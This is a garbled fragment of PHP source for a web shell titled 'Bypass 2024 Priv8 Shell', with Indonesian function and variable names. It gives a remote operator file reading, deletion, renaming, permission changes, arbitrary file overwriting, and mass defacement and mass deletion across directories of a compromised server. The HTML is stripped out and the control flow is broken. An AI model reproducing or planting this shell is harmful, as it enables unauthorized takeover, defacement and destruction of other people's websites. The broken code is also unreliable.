".$dir." | |||
$file |
Bypass 2024 Priv8 Shell
'; echo " ".htmlspecialchars(file_get_contents($_GET['fileloc'])).""; author(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { if (is_dir($_POST['path'])) { xrmdir($_POST['path']); if (file_exists($_POST['path'])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST['path'])) { @unlink($_POST['path']); if (file_exists($_POST['path'])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } elseif($_GET['do'] === "mass") { if($_POST['start']) { if($_POST['mass_type'] === 'singledir') { print " "; massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']); print "
"; } elseif($_POST['mass_type'] === 'alldir') { print "
"; massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir"); print "
"; } elseif($_POST['mass_type'] === "delete") { print "
"; massdelete($_POST['d_dir'], $_POST['d_file']); print "
"; } } else { print ""; echo ''; if (isset($_POST['chm0d'])) { $cm = @chmod($_POST['path'], $_POST['perm']); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } } } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { if (isset($_POST['gantin'])) { $ren = @rename($_POST['path'], $_POST['newname']); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST['name'])) { $namaawal = $_POST['newname']; } else { $namawal = $_POST['name']; } echo " "; echo ''; } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { if (isset($_POST['gasedit'])) { $edit = @file_put_contents($_POST['path'], $_POST['src']); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo " "; echo ' '; } echo ' '; foreach($lokasinya as $dir){ if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($lokasinya as $file) { if(!is_file("$lokasi/$file")) continue; $size = filesize("$lokasi/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; } else { $size = $size.' KB'; } echo ""; } echo '
'; author(); ?>